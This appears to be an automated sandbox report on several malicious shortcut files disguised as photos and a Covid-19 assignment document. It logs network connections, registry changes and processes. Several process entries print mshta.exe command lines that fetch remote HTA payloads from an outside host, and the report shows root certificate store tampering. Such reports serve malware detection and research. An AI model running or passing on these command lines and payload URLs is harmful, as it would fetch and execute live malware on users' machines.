US 204.79.197.203:443 api.msn.com tcp
US 8.8.8.8:53 tsfe.trafficshaping.dsp.mp.microsoft.com udp
IE 20.54.110.119:443 tsfe.trafficshaping.dsp.mp.microsoft.com tcp
IE 20.54.110.119:443 tsfe.trafficshaping.dsp.mp.microsoft.com tcp
US 8.8.8.8:53 dl.delivery.mp.microsoft.com udp
US 13.107.4.50:80 dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 dl.delivery.mp.microsoft.com tcp
US 8.8.8.8:53 tlu.dl.delivery.mp.microsoft.com udp
US 13.107.4.50:80 tlu.dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 tlu.dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 tlu.dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 tlu.dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 tlu.dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 tlu.dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 tlu.dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 tlu.dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 tlu.dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 tlu.dl.delivery.mp.microsoft.com tcp
IE 20.54.110.119:443 tsfe.trafficshaping.dsp.mp.microsoft.com tcp
US 13.107.4.50:80 tlu.dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 tlu.dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 tlu.dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 tlu.dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 tlu.dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 tlu.dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 tlu.dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 tlu.dl.delivery.mp.microsoft.com tcp
US 13.107.21.200:443 tcp
US 8.8.8.8:53 4.tlu.dl.delivery.mp.microsoft.com udp
NL 87.248.202.1:80 4.tlu.dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 tlu.dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 tlu.dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 tlu.dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 tlu.dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 tlu.dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 tlu.dl.delivery.mp.microsoft.com tcp
US 8.8.8.8:53 tlu.dl.delivery.mp.microsoft.com udp
US 209.197.3.8:80 tlu.dl.delivery.mp.microsoft.com tcp
US 209.197.3.8:80 tlu.dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 tlu.dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 tlu.dl.delivery.mp.microsoft.com tcp
US 209.197.3.8:80 tlu.dl.delivery.mp.microsoft.com tcp
US 209.197.3.8:80 tlu.dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 tlu.dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 tlu.dl.delivery.mp.microsoft.com tcp
US 209.197.3.8:80 tlu.dl.delivery.mp.microsoft.com tcp
US 209.197.3.8:80 tlu.dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 tlu.dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 tlu.dl.delivery.mp.microsoft.com tcp
US 209.197.3.8:80 tlu.dl.delivery.mp.microsoft.com tcp
US 209.197.3.8:80 tlu.dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 tlu.dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 tlu.dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 tlu.dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 tlu.dl.delivery.mp.microsoft.com tcp
US 209.197.3.8:80 tlu.dl.delivery.mp.microsoft.com tcp
US 209.197.3.8:80 tlu.dl.delivery.mp.microsoft.com tcp
US 209.197.3.8:80 tlu.dl.delivery.mp.microsoft.com tcp
US 209.197.3.8:80 tlu.dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 tlu.dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 tlu.dl.delivery.mp.microsoft.com tcp
US 209.197.3.8:80 tlu.dl.delivery.mp.microsoft.com tcp
US 209.197.3.8:80 tlu.dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 tlu.dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 tlu.dl.delivery.mp.microsoft.com tcp
US 209.197.3.8:80 tlu.dl.delivery.mp.microsoft.com tcp
US 209.197.3.8:80 tlu.dl.delivery.mp.microsoft.com tcp
US 8.8.8.8:53 dl.delivery.mp.microsoft.com udp
US 13.107.4.50:80 dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 dl.delivery.mp.microsoft.com tcp
US 209.197.3.8:80 tlu.dl.delivery.mp.microsoft.com tcp
US 209.197.3.8:80 tlu.dl.delivery.mp.microsoft.com tcp
US 209.197.3.8:80 tlu.dl.delivery.mp.microsoft.com tcp
US 209.197.3.8:80 tlu.dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 dl.delivery.mp.microsoft.com tcp
US 209.197.3.8:80 tlu.dl.delivery.mp.microsoft.com tcp
US 209.197.3.8:80 tlu.dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 dl.delivery.mp.microsoft.com tcp
US 209.197.3.8:80 tlu.dl.delivery.mp.microsoft.com tcp
US 209.197.3.8:80 tlu.dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 dl.delivery.mp.microsoft.com tcp
US 209.197.3.8:80 tlu.dl.delivery.mp.microsoft.com tcp
US 209.197.3.8:80 tlu.dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 dl.delivery.mp.microsoft.com tcp
US 209.197.3.8:80 tlu.dl.delivery.mp.microsoft.com tcp
US 209.197.3.8:80 tlu.dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 dl.delivery.mp.microsoft.com tcp
US 13.107.4.50:80 dl.delivery.mp.microsoft.com tcp
US 209.197.3.8:80 tlu.dl.delivery.mp.microsoft.com tcp
US 209.197.3.8:80 tlu.dl.delivery.mp.microsoft.com tcp

Files

memory/1264-135-0x0000019CBD940000-0x0000019CBE401000-memory.dmp

memory/1264-136-0x0000019CD6F96000-0x0000019CD6F97000-memory.dmp

memory/3736-137-0x0000016EE8F60000-0x0000016EE8F70000-memory.dmp

memory/3736-138-0x0000016EE9190000-0x0000016EE91A0000-memory.dmp

memory/3736-139-0x0000016EE9380000-0x0000016EE9384000-memory.dmp

memory/3736-140-0x0000016EEB910000-0x0000016EEB914000-memory.dmp

memory/3736-141-0x0000016EEB910000-0x0000016EEB914000-memory.dmp

memory/3736-142-0x0000016EEB940000-0x0000016EEB944000-memory.dmp

memory/3736-143-0x0000016EEB920000-0x0000016EEB921000-memory.dmp

memory/3736-144-0x0000016EEBA00000-0x0000016EEBA04000-memory.dmp

memory/3736-145-0x0000016EEB9B0000-0x0000016EEB9B4000-memory.dmp

memory/3736-146-0x0000016EEBAC0000-0x0000016EEBAC4000-memory.dmp

memory/3736-147-0x0000016EEB9A0000-0x0000016EEB9A4000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2022-03-22 12:37

Reported

2022-03-22 12:58

Platform

win7-20220311-en

Max time kernel

301s

Max time network

1219s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG20210713121548.jpg.lnk

Signatures

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\System32\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\System32\mshta.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Windows\System32\mshta.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Windows\System32\mshta.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Windows\System32\mshta.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Windows\System32\mshta.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\mshta.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1960 wrote to memory of 620 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 1960 wrote to memory of 620 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 1960 wrote to memory of 620 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 620 wrote to memory of 1116 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe
PID 620 wrote to memory of 1116 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe
PID 620 wrote to memory of 1116 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG20210713121548.jpg.lnk

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" https://inapharma.in/css/files/photos/Radhika-Images/Image5

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" C:\ProgramData\Duolingo\windate.hta

Network

Country Destination Domain Proto
US 8.8.8.8:53 inapharma.in udp
US 162.144.86.32:443 inapharma.in tcp
US 8.8.8.8:53 crl.comodoca.com udp
US 104.18.30.182:80 crl.comodoca.com tcp
US 8.8.8.8:53 crl.usertrust.com udp
US 104.18.30.182:80 crl.usertrust.com tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 104.18.31.182:80 crl.usertrust.com tcp
US 104.18.31.182:80 crl.usertrust.com tcp
US 104.18.31.182:80 crl.usertrust.com tcp
US 162.144.86.32:443 inapharma.in tcp

Files

memory/1960-54-0x000007FEFC161000-0x000007FEFC163000-memory.dmp

memory/620-91-0x0000000003AE0000-0x0000000003AE8000-memory.dmp

memory/620-92-0x000007FEF4010000-0x000007FEF49FC000-memory.dmp

memory/620-93-0x000000001D177000-0x000000001D178000-memory.dmp

C:\ProgramData\Duolingo\windate.hta

MD5 df0ae835a1dc249c25f56c96a19c63c7
SHA1 388bb0c49057b08a6fc5e7d4fcaab18754650c59
SHA256 7838794872d83079d1a912e0201a76aff8b42404dde2117a5c57a3bb3310d1df
SHA512 d4f538231d4c67407778dbfa6d825c53e59ce70e11a9d8add0e47ee248c0d8b5053285f197e9259af24898e15178a600f5bf852ef3a98258c61c9c67a9898aa8

Analysis: behavioral17

Detonation Overview

Submitted

2022-03-22 12:37

Reported

2022-03-22 12:58

Platform

win7-20220310-en

Max time kernel

296s

Max time network

1219s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG20210918232755.jpg.lnk

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\mshta.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\System32\mshta.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 904 wrote to memory of 1056 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 904 wrote to memory of 1056 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 904 wrote to memory of 1056 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG20210918232755.jpg.lnk

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" https://inapharma.in/css/files/photos/Radhika-Images/Image8

Network

Country Destination Domain Proto
US 8.8.8.8:53 inapharma.in udp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 8.8.8.8:53 crl.usertrust.com udp
US 104.18.30.182:80 crl.usertrust.com tcp
US 104.18.31.182:80 crl.usertrust.com tcp

Files

memory/904-54-0x000007FEFC391000-0x000007FEFC393000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2022-03-22 12:37

Reported

2022-03-22 12:58

Platform

win10v2004-20220310-en

Max time kernel

701s

Max time network

711s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG20100510171450.jpg.lnk

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\System32\svchost.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Windows\System32\mshta.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Windows\System32\mshta.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1456 wrote to memory of 2936 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 1456 wrote to memory of 2936 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG20100510171450.jpg.lnk

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" https://inapharma.in/css/files/photos/Radhika-Images/Image1

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS

Network

Country Destination Domain Proto
US 8.8.8.8:53 licensing.mp.microsoft.com udp
US 20.96.63.25:443 licensing.mp.microsoft.com tcp
US 8.8.8.8:53 storesdk.dsx.mp.microsoft.com udp
NL 104.80.225.205:443 storesdk.dsx.mp.microsoft.com tcp
US 20.96.63.25:443 licensing.mp.microsoft.com tcp
US 20.96.63.25:443 licensing.mp.microsoft.com tcp
US 20.96.63.25:443 licensing.mp.microsoft.com tcp
US 8.8.8.8:53 inapharma.in udp
US 162.144.86.32:443 inapharma.in tcp
NL 104.110.191.140:80 tcp
NL 104.110.191.140:80 tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 8.8.8.8:53 14.110.152.52.in-addr.arpa udp
US 8.8.8.8:53 api.msn.com udp
US 204.79.197.203:443 api.msn.com tcp

Files

memory/2936-135-0x00007FFFA1EF0000-0x00007FFFA29B1000-memory.dmp

memory/2936-136-0x000002A04DC06000-0x000002A04DC07000-memory.dmp

memory/3396-137-0x0000014B83360000-0x0000014B83370000-memory.dmp

memory/3396-138-0x0000014B83D60000-0x0000014B83D70000-memory.dmp

memory/3396-139-0x0000014B862E0000-0x0000014B862E4000-memory.dmp

memory/3396-140-0x0000014B865B0000-0x0000014B865B4000-memory.dmp

memory/3396-141-0x0000014B86590000-0x0000014B86591000-memory.dmp

memory/3396-142-0x0000014B86310000-0x0000014B86314000-memory.dmp

memory/3396-143-0x0000014B86300000-0x0000014B86301000-memory.dmp

memory/3396-144-0x0000014B86300000-0x0000014B86304000-memory.dmp

memory/3396-145-0x0000014B86200000-0x0000014B86201000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2022-03-22 12:37

Reported

2022-03-22 12:58

Platform

win7-20220311-en

Max time kernel

301s

Max time network

1218s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\Assignment-Covid-19.docx.lnk

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A

